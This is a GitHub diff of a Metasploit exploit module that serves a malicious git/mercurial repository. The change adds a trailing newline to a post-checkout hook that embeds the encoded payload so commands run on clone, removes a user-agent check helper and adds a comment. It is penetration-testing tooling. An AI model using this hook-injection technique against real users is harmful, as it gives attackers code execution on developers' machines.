File tree Expand file tree Collapse file tree 1 file changed +2
-18
lines changed
modules/exploits/multi/http Expand file tree Collapse file tree 1 file changed +2
-18
lines changed Original file line number Diff line number Diff line change @@ -103,7 +103,7 @@ def setup_git
103103 # .git/hooks/post-checkout and will subsequently execute commands of our
104104 # choosing upon cloning
105105 # build the hook file blob
106- full_cmd = "#!/bin/sh\n #{ payload . encoded }
106+ full_cmd = "#!/bin/sh\n #{ payload . encoded } \n "
107107 sha1 , content = build_object ( 'blob' , full_cmd )
108108 trigger = "/objects/#{ get_path ( sha1 ) }
109109 @repo_data [ :git ] [ :trigger ] = trigger
@@ -178,27 +178,11 @@ def exploit
178178 end
179179
180180 def primer
181+ # add the git and mercurial URIs as necessary
181182 hardcoded_uripath ( git_uri ) unless git_uri . blank?
182183 hardcoded_uripath ( mercurial_uri ) unless mercurial_uri . blank?
183184 end
184185
185- def check_user_agent ( cli , req , expected_ua_re = /^.+/ )
186- actual_ua = req . headers [ 'User-Agent' ]
187- if actual_ua
188- if actual_ua =~ expected_ua_re
189- true
190- else
191- vprint_status ( "Ignoring unaffected User-Agent for: #{ req } )
192- send_not_found ( cli )
193- false
194- end
195- else
196- vprint_status ( "Ignoring User-Agent-less request for: #{ req } )
197- send_not_found ( cli )
198- false
199- end
200- end
201-
202186 def on_request_uri ( cli , req )
203187 # if the URI is one of our repositories and the user-agent is that of git/mercurial
204188 # send back the appropriate data, otherwise just show the HTML version
You can’t perform that action at this time.
0 commit comments